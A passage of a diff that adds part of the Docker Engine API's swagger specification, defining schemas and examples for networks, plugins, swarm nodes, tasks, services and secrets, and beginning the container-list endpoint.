+        com.docker.network.bridge.enable_ip_masquerade: "true"
+        com.docker.network.bridge.host_binding_ipv4: "0.0.0.0"
+        com.docker.network.bridge.name: "docker0"
+        com.docker.network.driver.mtu: "1500"
+      Labels:
+        com.example.some-label: "some-value"
+        com.example.some-other-label: "some-other-value"
+  IPAM:
+    type: "object"
+    properties:
+      Driver:
+        description: "Name of the IPAM driver to use."
+        type: "string"
+        default: "default"
+      Config:
+        description: "List of IPAM configuration options, specified as a map: `{\"Subnet\": <CIDR>, \"IPRange\": <CIDR>, \"Gateway\": <IP address>, \"AuxAddress\": <device_name:IP address>}`"
+        type: "array"
+        items:
+          type: "object"
+          additionalProperties:
+            type: "string"
+      Options:
+        description: "Driver-specific options, specified as a map."
+        type: "array"
+        items:
+          type: "object"
+          additionalProperties:
+            type: "string"
+  NetworkContainer:
+    type: "object"
+    properties:
+      EndpointID:
+        type: "string"
+      MacAddress:
+        type: "string"
+      IPv4Address:
+        type: "string"
+      IPv6Address:
+        type: "string"
+
+  BuildInfo:
+    type: "object"
+    properties:
+      id:
+        type: "string"
+      stream:
+        type: "string"
+      error:
+        type: "string"
+      errorDetail:
+        $ref: "#/definitions/ErrorDetail"
+      status:
+        type: "string"
+      progress:
+        type: "string"
+      progressDetail:
+        $ref: "#/definitions/ProgressDetail"
+
+  CreateImageInfo:
+    type: "object"
+    properties:
+      error:
+        type: "string"
+      status:
+        type: "string"
+      progress:
+        type: "string"
+      progressDetail:
+        $ref: "#/definitions/ProgressDetail"
+
+  PushImageInfo:
+    type: "object"
+    properties:
+      error:
+        type: "string"
+      status:
+        type: "string"
+      progress:
+        type: "string"
+      progressDetail:
+        $ref: "#/definitions/ProgressDetail"
+  ErrorDetail:
+    type: "object"
+    properties:
+      code:
+        type: "integer"
+      message:
+        type: "string"
+  ProgressDetail:
+    type: "object"
+    properties:
+      code:
+        type: "integer"
+      message:
+        type: "integer"
+
+  ErrorResponse:
+    description: "Represents an error."
+    type: "object"
+    required: ["message"]
+    properties:
+      message:
+        description: "The error message."
+        type: "string"
+        x-nullable: false
+    example:
+      message: "Something went wrong."
+
+  IdResponse:
+    description: "Response to an API call that returns just an Id"
+    type: "object"
+    required: ["Id"]
+    properties:
+      Id:
+        description: "The id of the newly created object."
+        type: "string"
+        x-nullable: false
+
+  EndpointSettings:
+    description: "Configuration for a network endpoint."
+    type: "object"
+    properties:
+      IPAMConfig:
+        description: "IPAM configurations for the endpoint"
+        type: "object"
+        properties:
+          IPv4Address:
+            type: "string"
+          IPv6Address:
+            type: "string"
+          LinkLocalIPs:
+            type: "array"
+            items:
+              type: "string"
+      Links:
+        type: "array"
+        items:
+          type: "string"
+      Aliases:
+        type: "array"
+        items:
+          type: "string"
+      NetworkID:
+        type: "string"
+      EndpointID:
+        type: "string"
+      Gateway:
+        type: "string"
+      IPAddress:
+        type: "string"
+      IPPrefixLen:
+        type: "integer"
+      IPv6Gateway:
+        type: "string"
+      GlobalIPv6Address:
+        type: "string"
+      GlobalIPv6PrefixLen:
+        type: "integer"
+        format: "int64"
+      MacAddress:
+        type: "string"
+
+  PluginMount:
+    type: "object"
+    x-nullable: false
+    required: [Name, Description, Settable, Source, Destination, Type, Options]
+    properties:
+      Name:
+        type: "string"
+        x-nullable: false
+      Description:
+        type: "string"
+        x-nullable: false
+      Settable:
+        type: "array"
+        items:
+          type: "string"
+      Source:
+        type: "string"
+      Destination:
+        type: "string"
+        x-nullable: false
+      Type:
+        type: "string"
+        x-nullable: false
+      Options:
+        type: "array"
+        items:
+          type: "string"
+
+  PluginDevice:
+    type: "object"
+    required: [Name, Description, Settable, Path]
+    x-nullable: false
+    properties:
+      Name:
+        type: "string"
+        x-nullable: false
+      Description:
+        type: "string"
+        x-nullable: false
+      Settable:
+        type: "array"
+        items:
+          type: "string"
+      Path:
+        type: "string"
+
+  PluginEnv:
+    type: "object"
+    x-nullable: false
+    required: [Name, Description, Settable, Value]
+    properties:
+      Name:
+        x-nullable: false
+        type: "string"
+      Description:
+        x-nullable: false
+        type: "string"
+      Settable:
+        type: "array"
+        items:
+          type: "string"
+      Value:
+        type: "string"
+
+  PluginInterfaceType:
+    type: "object"
+    x-nullable: false
+    required: [Prefix, Capability, Version]
+    properties:
+      Prefix:
+        type: "string"
+        x-nullable: false
+      Capability:
+        type: "string"
+        x-nullable: false
+      Version:
+        type: "string"
+        x-nullable: false
+
+  Plugin:
+    description: "A plugin for the Engine API"
+    type: "object"
+    required: [Settings, Enabled, Config, Name]
+    properties:
+      Id:
+        type: "string"
+      Name:
+        type: "string"
+        x-nullable: false
+      Enabled:
+        description: "True when the plugin is running. False when the plugin is not running, only installed."
+        type: "boolean"
+        x-nullable: false
+      Settings:
+        description: "Settings that can be modified by users."
+        type: "object"
+        x-nullable: false
+        required: [Args, Devices, Env, Mounts]
+        properties:
+          Mounts:
+            type: "array"
+            items:
+              $ref: "#/definitions/PluginMount"
+          Env:
+            type: "array"
+            items:
+              type: "string"
+          Args:
+            type: "array"
+            items:
+              type: "string"
+          Devices:
+            type: "array"
+            items:
+              $ref: "#/definitions/PluginDevice"
+      PluginReference:
+        description: "plugin remote reference used to push/pull the plugin"
+        type: "string"
+        x-nullable: false
+      Config:
+        description: "The config of a plugin."
+        type: "object"
+        x-nullable: false
+        required:
+          - Description
+          - Documentation
+          - Interface
+          - Entrypoint
+          - WorkDir
+          - Network
+          - Linux
+          - PropagatedMount
+          - Mounts
+          - Env
+          - Args
+        properties:
+          Description:
+            type: "string"
+            x-nullable: false
+          Documentation:
+            type: "string"
+            x-nullable: false
+          Interface:
+            description: "The interface between Docker and the plugin"
+            x-nullable: false
+            type: "object"
+            required: [Types, Socket]
+            properties:
+              Types:
+                type: "array"
+                items:
+                  $ref: "#/definitions/PluginInterfaceType"
+              Socket:
+                type: "string"
+                x-nullable: false
+          Entrypoint:
+            type: "array"
+            items:
+              type: "string"
+          WorkDir:
+            type: "string"
+            x-nullable: false
+          User:
+            type: "object"
+            x-nullable: false
+            properties:
+              UID:
+                type: "integer"
+                format: "uint32"
+              GID:
+                type: "integer"
+                format: "uint32"
+          Network:
+            type: "object"
+            x-nullable: false
+            required: [Type]
+            properties:
+              Type:
+                x-nullable: false
+                type: "string"
+          Linux:
+            type: "object"
+            x-nullable: false
+            required: [Capabilities, AllowAllDevices, Devices]
+            properties:
+              Capabilities:
+                type: "array"
+                items:
+                  type: "string"
+              AllowAllDevices:
+                type: "boolean"
+                x-nullable: false
+              Devices:
+                type: "array"
+                items:
+                  $ref: "#/definitions/PluginDevice"
+          PropagatedMount:
+            type: "string"
+            x-nullable: false
+          Mounts:
+            type: "array"
+            items:
+              $ref: "#/definitions/PluginMount"
+          Env:
+            type: "array"
+            items:
+              $ref: "#/definitions/PluginEnv"
+          Args:
+            type: "object"
+            x-nullable: false
+            required: [Name, Description, Settable, Value]
+            properties:
+              Name:
+                x-nullable: false
+                type: "string"
+              Description:
+                x-nullable: false
+                type: "string"
+              Settable:
+                type: "array"
+                items:
+                  type: "string"
+              Value:
+                type: "array"
+                items:
+                  type: "string"
+          rootfs:
+            type: "object"
+            properties:
+              type:
+                type: "string"
+              diff_ids:
+                type: "array"
+                items:
+                  type: "string"
+    example:
+      Id: "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078"
+      Name: "tiborvass/sample-volume-plugin"
+      Tag: "latest"
+      Active: true
+      Settings:
+        Env:
+          - "DEBUG=0"
+        Args: null
+        Devices: null
+      Config:
+        Description: "A sample volume plugin for Docker"
+        Documentation: "https://docs.docker.com/engine/extend/plugins/"
+        Interface:
+          Types:
+            - "docker.volumedriver/1.0"
+          Socket: "plugins.sock"
+        Entrypoint:
+          - "/usr/bin/sample-volume-plugin"
+          - "/data"
+        WorkDir: ""
+        User: {}
+        Network:
+          Type: ""
+        Linux:
+          Capabilities: null
+          AllowAllDevices: false
+          Devices: null
+        Mounts: null
+        PropagatedMount: "/data"
+        Env:
+          - Name: "DEBUG"
+            Description: "If set, prints debug messages"
+            Settable: null
+            Value: "0"
+        Args:
+          Name: "args"
+          Description: "command line arguments"
+          Settable: null
+          Value: []
+
+  NodeSpec:
+    type: "object"
+    properties:
+      Name:
+        description: "Name for the node."
+        type: "string"
+      Labels:
+        description: "User-defined key/value metadata."
+        type: "object"
+        additionalProperties:
+          type: "string"
+      Role:
+        description: "Role of the node."
+        type: "string"
+        enum:
+          - "worker"
+          - "manager"
+      Availability:
+        description: "Availability of the node."
+        type: "string"
+        enum:
+          - "active"
+          - "pause"
+          - "drain"
+    example:
+      Availability: "active"
+      Name: "node-name"
+      Role: "manager"
+      Labels:
+        foo: "bar"
+  Node:
+    type: "object"
+    properties:
+      ID:
+        type: "string"
+      Version:
+        type: "object"
+        properties:
+          Index:
+            type: "integer"
+            format: "int64"
+      CreatedAt:
+        type: "string"
+        format: "dateTime"
+      UpdatedAt:
+        type: "string"
+        format: "dateTime"
+      Spec:
+        $ref: "#/definitions/NodeSpec"
+      Description:
+        type: "object"
+        properties:
+          Hostname:
+            type: "string"
+          Platform:
+            type: "object"
+            properties:
+              Architecture:
+                type: "string"
+              OS:
+                type: "string"
+          Resources:
+            type: "object"
+            properties:
+              NanoCPUs:
+                type: "integer"
+                format: "int64"
+              MemoryBytes:
+                type: "integer"
+                format: "int64"
+          Engine:
+            type: "object"
+            properties:
+              EngineVersion:
+                type: "string"
+              Labels:
+                type: "object"
+                additionalProperties:
+                  type: "string"
+              Plugins:
+                type: "array"
+                items:
+                  type: "object"
+                  properties:
+                    Type:
+                      type: "string"
+                    Name:
+                      type: "string"
+    example:
+      ID: "24ifsmvkjbyhk"
+      Version:
+        Index: 8
+      CreatedAt: "2016-06-07T20:31:11.853781916Z"
+      UpdatedAt: "2016-06-07T20:31:11.999868824Z"
+      Spec:
+        Name: "my-node"
+        Role: "manager"
+        Availability: "active"
+        Labels:
+          foo: "bar"
+      Description:
+        Hostname: "bf3067039e47"
+        Platform:
+          Architecture: "x86_64"
+          OS: "linux"
+        Resources:
+          NanoCPUs: 4000000000
+          MemoryBytes: 8272408576
+        Engine:
+          EngineVersion: "1.13.0"
+          Labels:
+            foo: "bar"
+          Plugins:
+            - Type: "Volume"
+              Name: "local"
+            - Type: "Network"
+              Name: "bridge"
+            - Type: "Network"
+              Name: "null"
+            - Type: "Network"
+              Name: "overlay"
+      Status:
+        State: "ready"
+        Addr: "172.17.0.2"
+      ManagerStatus:
+        Leader: true
+        Reachability: "reachable"
+        Addr: "172.17.0.2:2377"
+  SwarmSpec:
+    description: "User modifiable swarm configuration."
+    type: "object"
+    properties:
+      Name:
+        description: "Name of the swarm."
+        type: "string"
+      Labels:
+        description: "User-defined key/value metadata."
+        type: "object"
+        additionalProperties:
+          type: "string"
+      Orchestration:
+        description: "Orchestration configuration."
+        type: "object"
+        properties:
+          TaskHistoryRetentionLimit:
+            description: "The number of historic tasks to keep per instance or node. If negative, never remove completed or failed tasks."
+            type: "integer"
+            format: "int64"
+      Raft:
+        description: "Raft configuration."
+        type: "object"
+        properties:
+          SnapshotInterval:
+            description: "The number of log entries between snapshots."
+            type: "integer"
+            format: "int64"
+          KeepOldSnapshots:
+            description: "The number of snapshots to keep beyond the current snapshot."
+            type: "integer"
+            format: "int64"
+          LogEntriesForSlowFollowers:
+            description: "The number of log entries to keep around to sync up slow followers after a snapshot is created."
+            type: "integer"
+            format: "int64"
+          ElectionTick:
+            description: |
+              The number of ticks that a follower will wait for a message from the leader before becoming a candidate and starting an election. `ElectionTick` must be greater than `HeartbeatTick`.
+
+              A tick currently defaults to one second, so these translate directly to seconds currently, but this is NOT guaranteed.
+            type: "integer"
+          HeartbeatTick:
+            description: |
+              The number of ticks between heartbeats. Every HeartbeatTick ticks, the leader will send a heartbeat to the followers.
+
+              A tick currently defaults to one second, so these translate directly to seconds currently, but this is NOT guaranteed.
+            type: "integer"
+      Dispatcher:
+        description: "Dispatcher configuration."
+        type: "object"
+        properties:
+          HeartbeatPeriod:
+            description: "The delay for an agent to send a heartbeat to the dispatcher."
+            type: "integer"
+            format: "int64"
+      CAConfig:
+        description: "CA configuration."
+        type: "object"
+        properties:
+          NodeCertExpiry:
+            description: "The duration node certificates are issued for."
+            type: "integer"
+            format: "int64"
+          ExternalCAs:
+            description: "Configuration for forwarding signing requests to an external certificate authority."
+            type: "array"
+            items:
+              type: "object"
+              properties:
+                Protocol:
+                  description: "Protocol for communication with the external CA (currently only `cfssl` is supported)."
+                  type: "string"
+                  enum:
+                    - "cfssl"
+                  default: "cfssl"
+                URL:
+                  description: "URL where certificate signing requests should be sent."
+                  type: "string"
+                Options:
+                  description: "An object with key/value pairs that are interpreted as protocol-specific options for the external CA driver."
+                  type: "object"
+                  additionalProperties:
+                    type: "string"
+      EncryptionConfig:
+        description: "Parameters related to encryption-at-rest."
+        type: "object"
+        properties:
+          AutoLockManagers:
+            description: "If set, generate a key and use it to lock data stored on the managers."
+            type: "boolean"
+      TaskDefaults:
+        description: "Defaults for creating tasks in this cluster."
+        type: "object"
+        properties:
+          LogDriver:
+            description: |
+              The log driver to use for tasks created in the orchestrator if unspecified by a service.
+
+              Updating this value will only have an affect on new tasks. Old tasks will continue use their previously configured log driver until recreated.
+            type: "object"
+            properties:
+              Name:
+                type: "string"
+              Options:
+                type: "object"
+                additionalProperties:
+                  type: "string"
+    example:
+      Name: "default"
+      Orchestration:
+        TaskHistoryRetentionLimit: 10
+      Raft:
+        SnapshotInterval: 10000
+        LogEntriesForSlowFollowers: 500
+        HeartbeatTick: 1
+        ElectionTick: 3
+      Dispatcher:
+        HeartbeatPeriod: 5000000000
+      CAConfig:
+        NodeCertExpiry: 7776000000000000
+      JoinTokens:
+        Worker: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx"
+        Manager: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2"
+      EncryptionConfig:
+        AutoLockManagers: false
+  # The Swarm information for `GET /info`. It is the same as `GET /swarm`, but
+  # without `JoinTokens`.
+  ClusterInfo:
+    type: "object"
+    properties:
+      ID:
+        description: "The ID of the swarm."
+        type: "string"
+      Version:
+        type: "object"
+        properties:
+          Index:
+            type: "integer"
+            format: "int64"
+      CreatedAt:
+        type: "string"
+        format: "dateTime"
+      UpdatedAt:
+        type: "string"
+        format: "dateTime"
+      Spec:
+        $ref: "#/definitions/SwarmSpec"
+  TaskSpec:
+    description: "User modifiable task configuration."
+    type: "object"
+    properties:
+      ContainerSpec:
+        type: "object"
+        properties:
+          Image:
+            description: "The image name to use for the container."
+            type: "string"
+          Command:
+            description: "The command to be run in the image."
+            type: "array"
+            items:
+              type: "string"
+          Args:
+            description: "Arguments to the command."
+            type: "array"
+            items:
+              type: "string"
+          Env:
+            description: "A list of environment variables in the form `VAR=value`."
+            type: "array"
+            items:
+              type: "string"
+          Dir:
+            description: "The working directory for commands to run in."
+            type: "string"
+          User:
+            description: "The user inside the container."
+            type: "string"
+          Labels:
+            description: "User-defined key/value data."
+            type: "object"
+            additionalProperties:
+              type: "string"
+          TTY:
+            description: "Whether a pseudo-TTY should be allocated."
+            type: "boolean"
+          Mounts:
+            description: "Specification for mounts to be added to containers created as part of the service."
+            type: "array"
+            items:
+              $ref: "#/definitions/Mount"
+          StopGracePeriod:
+            description: "Amount of time to wait for the container to terminate before forcefully killing it."
+            type: "integer"
+            format: "int64"
+          DNSConfig:
+            description: "Specification for DNS related configurations in resolver configuration file (`resolv.conf`)."
+            type: "object"
+            properties:
+              Nameservers:
+                description: "The IP addresses of the name servers."
+                type: "array"
+                items:
+                  type: "string"
+              Search:
+                description: "A search list for host-name lookup."
+                type: "array"
+                items:
+                  type: "string"
+              Options:
+                description: "A list of internal resolver variables to be modified (e.g., `debug`, `ndots:3`, etc.)."
+                type: "array"
+                items:
+                  type: "string"
+      Resources:
+        description: "Resource requirements which apply to each individual container created as part of the service."
+        type: "object"
+        properties:
+          Limits:
+            description: "Define resources limits."
+            type: "object"
+            properties:
+              NanoCPUs:
+                description: "CPU limit in units of 10<sup>-9</sup> CPU shares."
+                type: "integer"
+                format: "int64"
+              MemoryBytes:
+                description: "Memory limit in Bytes."
+                type: "integer"
+                format: "int64"
+          Reservation:
+            description: "Define resources reservation."
+            properties:
+              NanoCPUs:
+                description: "CPU reservation in units of 10<sup>-9</sup> CPU shares."
+                type: "integer"
+                format: "int64"
+              MemoryBytes:
+                description: "Memory reservation in Bytes."
+                type: "integer"
+                format: "int64"
+      RestartPolicy:
+        description: "Specification for the restart policy which applies to containers created as part of this service."
+        type: "object"
+        properties:
+          Condition:
+            description: "Condition for restart."
+            type: "string"
+            enum:
+              - "none"
+              - "on-failure"
+              - "any"
+          Delay:
+            description: "Delay between restart attempts."
+            type: "integer"
+            format: "int64"
+          MaxAttempts:
+            description: "Maximum attempts to restart a given container before giving up (default value is 0, which is ignored)."
+            type: "integer"
+            format: "int64"
+            default: 0
+          Window:
+            description: "Windows is the time window used to evaluate the restart policy (default value is 0, which is unbounded)."
+            type: "integer"
+            format: "int64"
+            default: 0
+      Placement:
+        type: "object"
+        properties:
+          Constraints:
+            description: "An array of constraints."
+            type: "array"
+            items:
+              type: "string"
+      ForceUpdate:
+        description: "A counter that triggers an update even if no relevant parameters have been changed."
+        type: "integer"
+      Networks:
+        type: "array"
+        items:
+          type: "object"
+          properties:
+            Target:
+              type: "string"
+            Aliases:
+              type: "array"
+              items:
+                type: "string"
+      LogDriver:
+        description: "Specifies the log driver to use for tasks created from this spec. If not present, the default one for the swarm will be used, finally falling back to the engine default if not specified."
+        type: "object"
+        properties:
+          Name:
+            type: "string"
+          Options:
+            type: "object"
+            additionalProperties:
+              type: "string"
+  TaskState:
+    type: "string"
+    enum:
+      - "new"
+      - "allocated"
+      - "pending"
+      - "assigned"
+      - "accepted"
+      - "preparing"
+      - "ready"
+      - "starting"
+      - "running"
+      - "complete"
+      - "shutdown"
+      - "failed"
+      - "rejected"
+  Task:
+    type: "object"
+    properties:
+      ID:
+        description: "The ID of the task."
+        type: "string"
+      Version:
+        type: "object"
+        properties:
+          Index:
+            type: "integer"
+            format: "int64"
+      CreatedAt:
+        type: "string"
+        format: "dateTime"
+      UpdatedAt:
+        type: "string"
+        format: "dateTime"
+      Name:
+        description: "Name of the task."
+        type: "string"
+      Labels:
+        description: "User-defined key/value metadata."
+        type: "object"
+        additionalProperties:
+          type: "string"
+      Spec:
+        $ref: "#/definitions/TaskSpec"
+      ServiceID:
+        description: "The ID of the service this task is part of."
+        type: "string"
+      Slot:
+        type: "integer"
+      NodeID:
+        description: "The ID of the node that this task is on."
+        type: "string"
+      Status:
+        type: "object"
+        properties:
+          Timestamp:
+            type: "string"
+            format: "dateTime"
+          State:
+            $ref: "#/definitions/TaskState"
+          Message:
+            type: "string"
+          Err:
+            type: "string"
+          ContainerStatus:
+            type: "object"
+            properties:
+              ContainerID:
+                type: "string"
+              PID:
+                type: "integer"
+              ExitCode:
+                type: "integer"
+      DesiredState:
+        $ref: "#/definitions/TaskState"
+    example:
+      ID: "0kzzo1i0y4jz6027t0k7aezc7"
+      Version:
+        Index: 71
+      CreatedAt: "2016-06-07T21:07:31.171892745Z"
+      UpdatedAt: "2016-06-07T21:07:31.376370513Z"
+      Spec:
+        ContainerSpec:
+          Image: "redis"
+        Resources:
+          Limits: {}
+          Reservations: {}
+        RestartPolicy:
+          Condition: "any"
+          MaxAttempts: 0
+        Placement: {}
+      ServiceID: "9mnpnzenvg8p8tdbtq4wvbkcz"
+      Slot: 1
+      NodeID: "60gvrl6tm78dmak4yl7srz94v"
+      Status:
+        Timestamp: "2016-06-07T21:07:31.290032978Z"
+        State: "running"
+        Message: "started"
+        ContainerStatus:
+          ContainerID: "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035"
+          PID: 677
+      DesiredState: "running"
+      NetworksAttachments:
+        - Network:
+            ID: "4qvuz4ko70xaltuqbt8956gd1"
+            Version:
+              Index: 18
+            CreatedAt: "2016-06-07T20:31:11.912919752Z"
+            UpdatedAt: "2016-06-07T21:07:29.955277358Z"
+            Spec:
+              Name: "ingress"
+              Labels:
+                com.docker.swarm.internal: "true"
+              DriverConfiguration: {}
+              IPAMOptions:
+                Driver: {}
+                Configs:
+                  - Subnet: "10.255.0.0/16"
+                    Gateway: "10.255.0.1"
+            DriverState:
+              Name: "overlay"
+              Options:
+                com.docker.network.driver.overlay.vxlanid_list: "256"
+            IPAMOptions:
+              Driver:
+                Name: "default"
+              Configs:
+                - Subnet: "10.255.0.0/16"
+                  Gateway: "10.255.0.1"
+          Addresses:
+            - "10.255.0.10/16"
+  ServiceSpec:
+    description: "User modifiable configuration for a service."
+    properties:
+      Name:
+        description: "Name of the service."
+        type: "string"
+      Labels:
+        description: "User-defined key/value metadata."
+        type: "object"
+        additionalProperties:
+          type: "string"
+      TaskTemplate:
+        $ref: "#/definitions/TaskSpec"
+      Mode:
+        description: "Scheduling mode for the service."
+        type: "object"
+        properties:
+          Replicated:
+            type: "object"
+            properties:
+              Replicas:
+                type: "integer"
+                format: "int64"
+          Global:
+            type: "object"
+      UpdateConfig:
+        description: "Specification for the update strategy of the service."
+        type: "object"
+        properties:
+          Parallelism:
+            description: "Maximum number of tasks to be updated in one iteration (0 means unlimited parallelism)."
+            type: "integer"
+            format: "int64"
+          Delay:
+            description: "Amount of time between updates, in nanoseconds."
+            type: "integer"
+            format: "int64"
+          FailureAction:
+            description: "Action to take if an updated task fails to run, or stops running during the update."
+            type: "string"
+            enum:
+              - "continue"
+              - "pause"
+          Monitor:
+            description: "Amount of time to monitor each updated task for failures, in nanoseconds."
+            type: "integer"
+            format: "int64"
+          MaxFailureRatio:
+            description: "The fraction of tasks that may fail during an update before the failure action is invoked, specified as a floating point number between 0 and 1."
+            type: "number"
+            default: 0
+      Networks:
+        description: "Array of network names or IDs to attach the service to."
+        type: "array"
+        items:
+          type: "object"
+          properties:
+            Target:
+              type: "string"
+            Aliases:
+              type: "array"
+              items:
+                type: "string"
+      EndpointSpec:
+        $ref: "#/definitions/EndpointSpec"
+  EndpointPortConfig:
+    type: "object"
+    properties:
+      Name:
+        type: "string"
+      Protocol:
+        type: "string"
+        enum:
+          - "tcp"
+          - "udp"
+      TargetPort:
+        description: "The port inside the container."
+        type: "integer"
+      PublishedPort:
+        description: "The port on the swarm hosts."
+        type: "integer"
+  EndpointSpec:
+    description: "Properties that can be configured to access and load balance a service."
+    type: "object"
+    properties:
+      Mode:
+        description: "The mode of resolution to use for internal load balancing
+      between tasks."
+        type: "string"
+        enum:
+          - "vip"
+          - "dnsrr"
+        default: "vip"
+      Ports:
+        description: "List of exposed ports that this service is accessible on from the outside. Ports can only be provided if `vip` resolution mode is used."
+        type: "array"
+        items:
+          $ref: "#/definitions/EndpointPortConfig"
+  Service:
+    type: "object"
+    properties:
+      ID:
+        type: "string"
+      Version:
+        type: "object"
+        properties:
+          Index:
+            type: "integer"
+            format: "int64"
+      CreatedAt:
+        type: "string"
+        format: "dateTime"
+      UpdatedAt:
+        type: "string"
+        format: "dateTime"
+      Spec:
+        $ref: "#/definitions/ServiceSpec"
+      Endpoint:
+        type: "object"
+        properties:
+          Spec:
+            $ref: "#/definitions/EndpointSpec"
+          Ports:
+            type: "array"
+            items:
+              $ref: "#/definitions/EndpointPortConfig"
+          VirtualIPs:
+            type: "array"
+            items:
+              type: "object"
+              properties:
+                NetworkID:
+                  type: "string"
+                Addr:
+                  type: "string"
+      UpdateStatus:
+        description: "The status of a service update."
+        type: "object"
+        properties:
+          State:
+            type: "string"
+            enum:
+              - "updating"
+              - "paused"
+              - "completed"
+          StartedAt:
+            type: "string"
+            format: "dateTime"
+          CompletedAt:
+            type: "string"
+            format: "dateTime"
+          Message:
+            type: "string"
+    example:
+      ID: "9mnpnzenvg8p8tdbtq4wvbkcz"
+      Version:
+        Index: 19
+      CreatedAt: "2016-06-07T21:05:51.880065305Z"
+      UpdatedAt: "2016-06-07T21:07:29.962229872Z"
+      Spec:
+        Name: "hopeful_cori"
+        TaskTemplate:
+          ContainerSpec:
+            Image: "redis"
+          Resources:
+            Limits: {}
+            Reservations: {}
+          RestartPolicy:
+            Condition: "any"
+            MaxAttempts: 0
+          Placement: {}
+          ForceUpdate: 0
+        Mode:
+          Replicated:
+            Replicas: 1
+        UpdateConfig:
+          Parallelism: 1
+          FailureAction: "pause"
+          Monitor: 15000000000
+          MaxFailureRatio: 0.15
+        EndpointSpec:
+          Mode: "vip"
+          Ports:
+            -
+              Protocol: "tcp"
+              TargetPort: 6379
+              PublishedPort: 30001
+      Endpoint:
+        Spec:
+          Mode: "vip"
+          Ports:
+            -
+              Protocol: "tcp"
+              TargetPort: 6379
+              PublishedPort: 30001
+        Ports:
+          -
+            Protocol: "tcp"
+            TargetPort: 6379
+            PublishedPort: 30001
+        VirtualIPs:
+          -
+            NetworkID: "4qvuz4ko70xaltuqbt8956gd1"
+            Addr: "10.255.0.2/16"
+          -
+            NetworkID: "4qvuz4ko70xaltuqbt8956gd1"
+            Addr: "10.255.0.3/16"
+  ImageDeleteResponse:
+    type: "object"
+    properties:
+      Untagged:
+        description: "The image ID of an image that was untagged"
+        type: "string"
+      Deleted:
+        description: "The image ID of an image that was deleted"
+        type: "string"
+  ServiceUpdateResponse:
+    type: "object"
+    properties:
+      Warnings:
+        description: "Optional warning messages"
+        type: "array"
+        items:
+          type: "string"
+    example:
+      Warning: "unable to pin image doesnotexist:latest to digest: image library/doesnotexist:latest not found"
+  ContainerSummary:
+    type: "array"
+    items:
+      type: "object"
+      properties:
+        Id:
+          description: "The ID of this container"
+          type: "string"
+          x-go-name: "ID"
+        Names:
+          description: "The names that this container has been given"
+          type: "array"
+          items:
+            type: "string"
+        Image:
+          description: "The name of the image used when creating this container"
+          type: "string"
+        ImageID:
+          description: "The ID of the image that this container was created from"
+          type: "string"
+        Command:
+          description: "Command to run when starting the container"
+          type: "string"
+        Created:
+          description: "When the container was created"
+          type: "integer"
+          format: "int64"
+        Ports:
+          description: "The ports exposed by this container"
+          type: "array"
+          items:
+            $ref: "#/definitions/Port"
+        SizeRw:
+          description: "The size of files that have been created or changed by this container"
+          type: "integer"
+          format: "int64"
+        SizeRootFs:
+          description: "The total size of all the files in this container"
+          type: "integer"
+          format: "int64"
+        Labels:
+          description: "User-defined key/value metadata."
+          type: "object"
+          additionalProperties:
+            type: "string"
+        State:
+          description: "The state of this container (e.g. `Exited`)"
+          type: "string"
+        Status:
+          description: "Additional human-readable status of this container (e.g. `Exit 0`)"
+          type: "string"
+        HostConfig:
+          type: "object"
+          properties:
+            NetworkMode:
+              type: "string"
+        NetworkSettings:
+          description: "A summary of the container's network settings"
+          type: "object"
+          properties:
+            Networks:
+              type: "object"
+              additionalProperties:
+                $ref: "#/definitions/EndpointSettings"
+        Mounts:
+          type: "array"
+          items:
+            $ref: "#/definitions/Mount"
+  SecretSpec:
+    type: "object"
+    properties:
+      Name:
+        description: "User-defined name of the secret."
+        type: "string"
+      Labels:
+        description: "User-defined key/value metadata."
+        type: "object"
+        additionalProperties:
+          type: "string"
+      Data:
+        description: "Base64-url-safe-encoded secret data"
+        type: "array"
+        items:
+          type: "string"
+  Secret:
+    type: "object"
+    properties:
+      ID:
+        type: "string"
+      Version:
+        type: "object"
+        properties:
+          Index:
+            type: "integer"
+            format: "int64"
+      CreatedAt:
+        type: "string"
+        format: "dateTime"
+      UpdatedAt:
+        type: "string"
+        format: "dateTime"
+      Spec:
+        $ref: "#/definitions/ServiceSpec"
+paths:
+  /containers/json:
+    get:
+      summary: "List containers"
+      operationId: "ContainerList"
+      produces:
+        - "application/json"
+      parameters:
+        - name: "all"
+          in: "query"
+          description: "Return all containers. By default, only running containers are shown"
+          type: "boolean"
+          default: false
+        - name: "limit"
+          in: "query"
+          description: "Return this number of most recently created containers, including non-running ones."
+          type: "integer"
+        - name: "size"
+          in: "query"
+          description: "Return the size of container as fields `SizeRw` and `SizeRootFs`."
+          type: "boolean"
+          default: false
+        - name: "filters"
+          in: "query"
+          description: |
+            Filters to process on the container list, encoded as JSON (a `map[string][]string`). For example, `{"status": ["paused"]}` will only return paused containers.
+
+            Available filters:
+            - `exited=<int>` containers with exit code of `<int>`
+            - `status=`(`created`|`restarting`|`running`|`removing`|`paused`|`exited`|`dead`)
+            - `label=key` or `label="key=value"` of a container label
+            - `isolation=`(`default`|`process`|`hyperv`) (Windows daemon only)
+            - `id=<ID>` a container's ID
+            - `name=<name>` a container's name
+            - `is-task=`(`true`|`false`)
+            - `ancestor`=(`<image-name>[:<tag>]`, `<image id>`, or `<image@digest>`)
+            - `before`=(`<container id>` or `<container name>`)
+            - `since`=(`<container id>` or `<container name>`)
+            - `volume`=(`<volume name>` or `<mount point destination>`)
+            - `network`=(`<network id>` or `<network name>`)
+            - `health`=(`starting`|`healthy`|`unhealthy`|`none`)
+          type: "string"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/ContainerSummary"
+          examples:
+            application/json:
+              - Id: "8dfafdbc3a40"
+                Names:
+                  - "/boring_feynman"
+                Image: "ubuntu:latest"
+                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
+                Command: "echo 1"
+                Created: 1367854155
+                State: "Exited"
+                Status: "Exit 0"
+                Ports:
+                  - PrivatePort: 2222
+                    PublicPort: 3333
+                    Type: "tcp"
+                Labels:
+                  com.example.vendor: "Acme"
+                  com.example.license: "GPL"
+                  com.example.version: "1.0"
+                SizeRw: 12288
+                SizeRootFs: 0
+                HostConfig:
+                  NetworkMode: "default"
